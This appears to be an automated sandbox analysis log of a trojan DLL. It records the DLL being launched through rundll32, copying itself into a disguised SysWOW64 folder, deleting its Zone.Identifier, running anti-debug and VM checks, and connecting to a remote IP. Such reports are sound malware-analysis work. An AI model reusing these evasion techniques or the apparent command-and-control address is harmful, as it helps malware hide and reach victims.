                      Source: C:\Windows\System32\loaddll32.exe :: Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\3pO1282Kpx.dll,akyncbgollmj
                      Source: unknown :: Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                      Source: unknown :: Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                      Source: unknown :: Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                      Source: unknown :: Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                      Source: unknown :: Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
                      Source: unknown :: Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                      Source: C:\Windows\SysWOW64\rundll32.exe :: Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\3pO1282Kpx.dll",Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exe :: Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Qfdohhzjskeoxat\kmkxxcep.fzg",diWFDzhLoc
                      Source: C:\Windows\SysWOW64\rundll32.exe :: Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\3pO1282Kpx.dll",Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exe :: Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\3pO1282Kpx.dll",Control_RunDLL
                      Source: unknown :: Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                      Source: C:\Windows\System32\svchost.exe :: Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2616 -ip 2616
                      Source: C:\Windows\System32\loaddll32.exe :: Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2616 -s 308
                      Source: C:\Windows\System32\svchost.exe :: Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 2616 -ip 2616
                      Source: C:\Windows\System32\loaddll32.exe :: Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2616 -s 316
                      Source: unknown :: Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Windows\SysWOW64\rundll32.exe :: Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Qfdohhzjskeoxat\kmkxxcep.fzg",Control_RunDLL
                      Source: C:\Windows\System32\svchost.exe :: Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                      Source: C:\Program Files\Windows Defender\MpCmdRun.exe :: Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknown :: Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknown :: Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknown :: Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k wsappx -p -s AppXSvc
                      Source: unknown :: Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Windows\System32\loaddll32.exe :: Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\3pO1282Kpx.dll",#1
                      Source: C:\Windows\System32\loaddll32.exe :: Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\3pO1282Kpx.dll,Control_RunDLL
                      Source: C:\Windows\System32\loaddll32.exe :: Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\3pO1282Kpx.dll,ajkaibu
                      Source: C:\Windows\System32\loaddll32.exe :: Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\3pO1282Kpx.dll,akyncbgollmj
                      Source: C:\Windows\SysWOW64\cmd.exe :: Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\3pO1282Kpx.dll",#1
                      Source: C:\Windows\SysWOW64\rundll32.exe :: Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Qfdohhzjskeoxat\kmkxxcep.fzg",diWFDzhLoc
                      Source: C:\Windows\SysWOW64\rundll32.exe :: Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\3pO1282Kpx.dll",Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exe :: Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\3pO1282Kpx.dll",Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exe :: Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\3pO1282Kpx.dll",Control_RunDLL
                      Source: C:\Windows\System32\svchost.exe :: Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                      Source: C:\Windows\SysWOW64\rundll32.exe :: Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Qfdohhzjskeoxat\kmkxxcep.fzg",Control_RunDLL
                      Source: C:\Windows\System32\svchost.exe :: Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2616 -ip 2616
                      Source: C:\Windows\System32\svchost.exe :: Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2616 -s 308
                      Source: C:\Windows\System32\svchost.exe :: Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 2616 -ip 2616
                      Source: C:\Windows\System32\svchost.exe :: Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2616 -s 316
                      Source: C:\Windows\SysWOW64\WerFault.exe :: Process created: unknown unknown
                      Source: C:\Windows\SysWOW64\WerFault.exe :: Process created: unknown unknown
                      Source: C:\Windows\SysWOW64\rundll32.exe :: Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
                      Source: C:\Windows\System32\svchost.exe :: File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WERE2A7.tmp
                      Source: classification engine :: Classification label: mal96.troj.evad.winDLL@46/21@0/2
                      Source: C:\Windows\SysWOW64\rundll32.exe :: File read: C:\Users\desktop.ini
                      Source: C:\Windows\SysWOW64\rundll32.exe :: Code function: 25_2_02981B99 CreateToolhelp32Snapshot,
                      Source: C:\Windows\System32\loaddll32.exe :: Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\3pO1282Kpx.dll,Control_RunDLL
                      Source: C:\Windows\SysWOW64\WerFault.exe :: Mutant created: \BaseNamedObjects\Local\SM0:4956:64:WilError_01
                      Source: C:\Windows\SysWOW64\WerFault.exe :: Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2616
                      Source: C:\Windows\SysWOW64\WerFault.exe :: Mutant created: \BaseNamedObjects\Local\SM0:5020:64:WilError_01
                      Source: C:\Windows\System32\conhost.exe :: Mutant created: \BaseNamedObjects\Local\SM0:2144:120:WilError_01
                      Source: C:\Windows\System32\svchost.exe :: File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\WerFault.exe :: File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\rundll32.exe :: Automated click: OK
                      Source: 3pO1282Kpx.dll :: Static PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: 3pO1282Kpx.dll :: Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000013.00000003.503577553.0000000004C71000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.529381238.00000000049C1000.00000004.00000001.sdmp
                      Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000013.00000003.503577553.0000000004C71000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.529381238.00000000049C1000.00000004.00000001.sdmp
                      Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000013.00000003.500168593.00000000048E8000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.503577553.0000000004C71000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.529381238.00000000049C1000.00000004.00000001.sdmp
                      Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000013.00000003.503577553.0000000004C71000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.529381238.00000000049C1000.00000004.00000001.sdmp
                      Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000013.00000003.503577553.0000000004C71000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.529381238.00000000049C1000.00000004.00000001.sdmp
                      Source: Binary string: wimm32.pdb source: WerFault.exe, 00000013.00000003.503577553.0000000004C71000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.529381238.00000000049C1000.00000004.00000001.sdmp
                      Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000013.00000003.503577553.0000000004C71000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.529381238.00000000049C1000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdb source: WerFault.exe, 00000013.00000003.503577553.0000000004C71000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.529381238.00000000049C1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.524895289.000000000296C000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.524500782.000000000296C000.00000004.00000001.sdmp
                      Source: Binary string: apphelp.pdb source: WerFault.exe, 00000013.00000003.503577553.0000000004C71000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.529381238.00000000049C1000.00000004.00000001.sdmp
                      Source: Binary string: wuser32.pdb source: WerFault.exe, 00000013.00000003.503577553.0000000004C71000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.529381238.00000000049C1000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdbk source: WerFault.exe, 00000013.00000003.503577553.0000000004C71000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.529381238.00000000049C1000.00000004.00000001.sdmp
                      Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000013.00000003.503577553.0000000004C71000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.529381238.00000000049C1000.00000004.00000001.sdmp
                      Source: Binary string: oCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 00000013.00000002.513347635.00000000028F2000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdb( source: WerFault.exe, 00000016.00000003.524895289.000000000296C000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.524500782.000000000296C000.00000004.00000001.sdmp
                      Source: C:\Windows\System32\loaddll32.exe :: Code function: 0_2_6EE96A93 push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exe :: Code function: 2_2_005213E7 push esi; retf
                      Source: C:\Windows\SysWOW64\rundll32.exe :: Code function: 2_2_6EE96A93 push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exe :: Code function: 4_2_006D13E7 push esi; retf
                      Source: C:\Windows\SysWOW64\rundll32.exe :: Code function: 14_2_033D13E7 push esi; retf
                      Source: C:\Windows\SysWOW64\rundll32.exe :: Code function: 25_2_029613E7 push esi; retf
                      Source: C:\Windows\System32\loaddll32.exe :: Code function: 0_2_6EE7E690 WaitForSingleObjectEx,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,CreateMutexA,CloseHandle,ReleaseMutex,
                      Source: C:\Windows\SysWOW64\rundll32.exe :: PE file moved: C:\Windows\SysWOW64\Qfdohhzjskeoxat\kmkxxcep.fzg

                      Hooking and other Techniques for Hiding and Protection:

                      Hides that the sample has been downloaded from the Internet (zone.identifier)
                      Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Qfdohhzjskeoxat\kmkxxcep.fzg:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\WerFault.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
                      Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exe TID: 2376 Thread sleep time: -30000s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 4192 Thread sleep time: -30000s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 4252 Thread sleep time: -90000s >= -30000s
                      Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                      Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
                      Source: C:\Windows\System32\svchost.exe Process information queried: ProcessInformation
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6EE90927 FindFirstFileExW,
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_6EE90927 FindFirstFileExW,
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 25_2_0297E2C8 FindFirstFileW,
                      Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation
                      Source: Amcache.hve.19.dr Binary or memory string: VMware
                      Source: Amcache.hve.19.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
                      Source: Amcache.hve.19.dr Binary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
                      Source: Amcache.hve.19.dr Binary or memory string: VMware Virtual USB Mouse
                      Source: Amcache.hve.19.dr Binary or memory string: VMware, Inc.
                      Source: Amcache.hve.19.dr Binary or memory string: VMware Virtual disk SCSI Disk Devicehbin
                      Source: Amcache.hve.19.dr Binary or memory string: Microsoft Hyper-V Generation Counter
                      Source: Amcache.hve.19.dr Binary or memory string: VMware7,1
                      Source: Amcache.hve.19.dr Binary or memory string: NECVMWar VMware SATA CD00
                      Source: Amcache.hve.19.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
                      Source: Amcache.hve.19.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.13989454.B64.1906190538,BiosReleaseDate:06/19/2019,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                      Source: svchost.exe, 00000006.00000002.640818249.000001ECCBE48000.00000004.00000001.sdmp, svchost.exe, 00000006.00000002.640848244.000001ECCBE5E000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.542568874.000000000466D000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000002.544208418.0000000004640000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000002.544260152.000000000466F000.00000004.00000001.sdmp, rundll32.exe, 00000019.00000003.718992325.0000000002BAD000.00000004.00000001.sdmp, rundll32.exe, 00000019.00000002.764113754.0000000002BAD000.00000004.00000001.sdmp, svchost.exe, 00000026.00000002.763567279.00000184DC0EF000.00000004.00000001.sdmp, svchost.exe, 00000026.00000002.761917887.00000184DC03C000.00000004.00000001.sdmp, svchost.exe, 00000026.00000002.762506607.00000184DC082000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
                      Source: Amcache.hve.19.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                      Source: Amcache.hve.19.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                      Source: rundll32.exe, 00000019.00000002.763936612.0000000002B95000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW(
                      Source: Amcache.hve.19.dr Binary or memory string: VMware, Inc.me
                      Source: Amcache.hve.19.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
                      Source: svchost.exe, 00000006.00000002.640399065.000001ECC6629000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW`
                      Source: Amcache.hve.19.dr Binary or memory string: VMware-42 35 bb 32 33 75 d2 27-52 00 3c e2 4b d4 32 71
                      Source: svchost.exe, 00000007.00000002.761991641.000002067B468000.00000004.00000001.sdmp, svchost.exe, 00000009.00000002.761427353.00000293E1229000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.540804894.0000000004647000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: Amcache.hve.19.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6EE90326 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6EE7E690 WaitForSingleObjectEx,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,CreateMutexA,CloseHandle,ReleaseMutex,
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6EE71290 GetProcessHeap,HeapAlloc,RtlAllocateHeap,HeapFree,
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6EE89990 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6EE8EC0B mov ecx, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6EE902CC mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6EE89920 mov esi, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6EE89920 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_005307D2 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_6EE89990 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_6EE8EC0B mov ecx, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_6EE902CC mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_6EE89920 mov esi, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_6EE89920 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_006E07D2 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_033E07D2 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 25_2_029707D2 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\loaddll32.exe Process queried: DebugPort
                      Source: C:\Windows\System32\loaddll32.exe Process queried: DebugPort
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6EE8A462 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6EE90326 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6EE8AB0C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_6EE8A462 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_6EE90326 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_6EE8AB0C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

                      HIPS / PFW / Operating System Protection Evasion:

                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 45.63.5.129 187
                      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\3pO1282Kpx.dll",#1
                      Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2616 -ip 2616
                      Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2616 -s 308
                      Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 2616 -ip 2616
                      Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2616 -s 316
                      Source: loaddll32.exe, 00000000.00000000.494151990.0000000001C10000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.515847002.0000000001C10000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.495645602.0000000001C10000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.517132807.0000000001C10000.00000002.00020000.sdmp, rundll32.exe, 00000019.00000002.764558363.0000000002FE0000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
                      Source: loaddll32.exe, 00000000.00000000.494151990.0000000001C10000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.515847002.0000000001C10000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.495645602.0000000001C10000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.517132807.0000000001C10000.00000002.00020000.sdmp, rundll32.exe, 00000019.00000002.764558363.0000000002FE0000.00000002.00020000.sdmp Binary or memory string: Progman
                      Source: loaddll32.exe, 00000000.00000000.494151990.0000000001C10000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.515847002.0000000001C10000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.495645602.0000000001C10000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.517132807.0000000001C10000.00000002.00020000.sdmp, rundll32.exe, 00000019.00000002.764558363.0000000002FE0000.00000002.00020000.sdmp Binary or memory string: SProgram Managerl
                      Source: loaddll32.exe, 00000000.00000000.494151990.0000000001C10000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.515847002.0000000001C10000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.495645602.0000000001C10000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.517132807.0000000001C10000.00000002.00020000.sdmp, rundll32.exe, 00000019.00000002.764558363.0000000002FE0000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd,
